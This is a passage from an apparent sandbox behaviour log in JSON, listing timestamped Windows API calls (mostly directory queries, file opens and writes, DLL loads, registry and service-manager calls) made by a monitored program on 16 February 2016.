"timestamp": "2016-02-16 17:41:36,064", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,064", "api": "LdrLoadDll"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,064", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,064", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,064", "api": "LdrLoadDll"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenServiceW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,064", "api": "LdrLoadDll"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenServiceW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", 